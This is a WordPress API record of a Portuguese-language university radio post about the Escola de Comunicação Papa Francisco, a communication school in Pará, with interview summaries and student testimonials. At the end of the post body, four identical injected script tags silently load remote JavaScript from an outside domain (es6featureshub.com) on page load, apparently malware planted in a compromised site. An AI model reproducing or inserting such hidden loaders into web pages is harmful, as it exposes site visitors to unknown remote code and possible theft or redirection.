{"id":13708,"date":"2023-07-04T15:07:29","date_gmt":"2023-07-04T18:07:29","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=13708"},"modified":"2025-10-21T12:57:44","modified_gmt":"2025-10-21T15:57:44","slug":"escola-de-comunicacao-papa-francisco","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/","title":{"rendered":"Escola de Comunica\u00e7\u00e3o Papa Francisco"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Escola de Comunica\u00e7\u00e3o Papa Francisco&#8221;<\/p><p class=\"category\">UFPA Entrevista<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/UFPA-ENTREVISTA-ESCOLA-PAPA-FRANCISCO-03.07.23.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>A Escola de Comunica\u00e7\u00e3o Papa Francisco est\u00e1 em destaque nesta edi\u00e7\u00e3o do<a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/ufpa-entrevista\/\" target=\"_blank\" rel=\"noreferrer noopener\"> UFPA Entrevista<\/a>. No programa, a jornalista e professora da Faculdade de Comunica\u00e7\u00e3o da UFPA, Rosane Streinbrenner, conversa com a professora Elizabeth Santos que, h\u00e1 15 anos, integra a equipe da Papa Francisco. Tamb\u00e9m participam do UFPA Entrevista, os alunos e ex-alunos Lucas Sena, Tabata Veloso, Gleisica Ferreira, F\u00e1bio Campos e Suelina.<\/p>\n\n\n\n<p>O curso t\u00e9cnico em comunica\u00e7\u00e3o da <a href=\"https:\/\/www.instagram.com\/escolapapafrancisco\/\" target=\"_blank\" rel=\"noreferrer noopener\">Escola Papa Francisco<\/a> prepara jovens e adultos que conclu\u00edram o ensino m\u00e9dio para atuarem no mercado de trabalho nas \u00e1reas operacionais de r\u00e1dio e televis\u00e3o. Assim, h\u00e1 mais de 20 anos, a Escola oferece aulas de edi\u00e7\u00e3o, locu\u00e7\u00e3o, entrevista, cenografia, cria\u00e7\u00e3o publicit\u00e1ria, \u00e9tica e cidadania. Anualmente, s\u00e3o ofertadas cerca de 30 vagas em processo seletivo que abrange duas fases. Na primeira, o candidato faz uma prova de reda\u00e7\u00e3o. Depois, os aprovados seguem para uma entrevista que define os selecionados para compor a turma. <\/p>\n\n\n\n<p>Com o objetivo principal de motivar pessoas que n\u00e3o tiveram oportunidades de ingressar no mercado de trabalho ou na universidade, a Escola de Comunica\u00e7\u00e3o Papa Francisco exerce um papel transformador por meio da educa\u00e7\u00e3o e da comunica\u00e7\u00e3o como relata Suelina. \u201cAos 54 anos eu me descobri comunicadora e cada dia mais eu estou apaixonada por essa \u00e1rea. E aquilo que eu aprendo na Escola Papa Francisco eu consigo aplicar no meu trabalho\u201d.<\/p>\n\n\n\n<p>Uma realidade compartilhada tamb\u00e9m pela professora Elizabeth Santos, ex-aluna da Papa Francisco, atualmente ela cursa Jornalismo na Faculdade de Comunica\u00e7\u00e3o da UFPA. \u201cVindo da periferia, onde nos deparamos com um sistema que insiste em mostrar que n\u00e3o temos condi\u00e7\u00f5es de ir al\u00e9m, a educa\u00e7\u00e3o surge como um caminho que nos mostra que somos capazes de superar essas limita\u00e7\u00f5es. Foi na Escola Papa Francisco que recebi o impulso necess\u00e1rio para compreender que n\u00e3o sou apenas uma pessoa da periferia, mas algu\u00e9m com habilidades e potencialidades capazes de transformar o meu dia a dia\u201d, relata Elizabeth.<\/p>\n\n\n\n<p>Assim como Elizabeth, Lucas Sena, ex- aluno da Papa Francisco, faz gradua\u00e7\u00e3o em Jornalismo na UFPA. Para ele, a educa\u00e7\u00e3o e a comunica\u00e7\u00e3o surgiram como um meio de ascender no mercado de trabalho e alcan\u00e7ar lugares antes inimagin\u00e1veis. \u201cA Papa Francisco nos proporciona oportunidades e abre portas mesmo que n\u00e3o sigamos na \u00e1rea da comunica\u00e7\u00e3o. E n\u00e3o se trata apenas de um curso que nos capacita profissionalmente mas, que, tamb\u00e9m, contribui significativamente para a nossa vida, para o nosso dia a dia enquanto cidad\u00e3os\u201d, destaca Lucas. &nbsp;<\/p>\n\n\n\n<p>No UFPA Entrevista, voc\u00ea ainda conhece um pouco sobre a hist\u00f3ria da Institui\u00e7\u00e3o contada no livro denominado \u201cPonte para o futuro: relatos e experi\u00eancias de uma educa\u00e7\u00e3o transformadora da Escola de Comunica\u00e7\u00e3o Papa Francisco\u201d, uma obra produzida por alunos, ex- alunos e professores sobre os 20 anos de exist\u00eancia e resist\u00eancia do espa\u00e7o que \u00e9 vinculado \u00e0 ONG Miss\u00e3o Friuli Amaz\u00f4nia, no Par\u00e1.   \u00a0<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Escola de Comunica\u00e7\u00e3o Papa Francisco\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\" aria-label=\"Read more about Escola de Comunica\u00e7\u00e3o Papa Francisco\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":13772,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[36],"tags":[],"class_list":["post-13708","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-entrevista"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Escola de Comunica\u00e7\u00e3o Papa Francisco - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"A Escola de Comunica\u00e7\u00e3o Papa Francisco, que transforma vidas, est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Escola de Comunica\u00e7\u00e3o Papa Francisco - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"A Escola de Comunica\u00e7\u00e3o Papa Francisco, que transforma vidas, est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-04T18:07:29+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T15:57:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1080\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Escola de Comunica\u00e7\u00e3o Papa Francisco\",\"datePublished\":\"2023-07-04T18:07:29+00:00\",\"dateModified\":\"2025-10-21T15:57:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\"},\"wordCount\":530,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1\",\"articleSection\":[\"UFPA Entrevista\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\",\"name\":\"Escola de Comunica\u00e7\u00e3o Papa Francisco - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1\",\"datePublished\":\"2023-07-04T18:07:29+00:00\",\"dateModified\":\"2025-10-21T15:57:44+00:00\",\"description\":\"A Escola de Comunica\u00e7\u00e3o Papa Francisco, que transforma vidas, est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1\",\"width\":1080,\"height\":1080,\"caption\":\"Escola de Comunica\u00e7\u00e3o Papa Francisco\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Escola de Comunica\u00e7\u00e3o Papa Francisco\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Escola de Comunica\u00e7\u00e3o Papa Francisco - Radio Web UFPA","description":"A Escola de Comunica\u00e7\u00e3o Papa Francisco, que transforma vidas, est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/","og_locale":"pt_BR","og_type":"article","og_title":"Escola de Comunica\u00e7\u00e3o Papa Francisco - Radio Web UFPA","og_description":"A Escola de Comunica\u00e7\u00e3o Papa Francisco, que transforma vidas, est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-07-04T18:07:29+00:00","article_modified_time":"2025-10-21T15:57:44+00:00","og_image":[{"width":1080,"height":1080,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1","type":"image\/png"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Escola de Comunica\u00e7\u00e3o Papa Francisco","datePublished":"2023-07-04T18:07:29+00:00","dateModified":"2025-10-21T15:57:44+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/"},"wordCount":530,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1","articleSection":["UFPA Entrevista"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/","name":"Escola de Comunica\u00e7\u00e3o Papa Francisco - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1","datePublished":"2023-07-04T18:07:29+00:00","dateModified":"2025-10-21T15:57:44+00:00","description":"A Escola de Comunica\u00e7\u00e3o Papa Francisco, que transforma vidas, est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1","width":1080,"height":1080,"caption":"Escola de Comunica\u00e7\u00e3o Papa Francisco"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Escola de Comunica\u00e7\u00e3o Papa Francisco"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/07\/Escola-Papa-Francisco.png?fit=1080%2C1080&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3z6","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=13708"}],"version-history":[{"count":23,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13708\/revisions"}],"predecessor-version":[{"id":17784,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13708\/revisions\/17784"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/13772"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=13708"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=13708"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=13708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}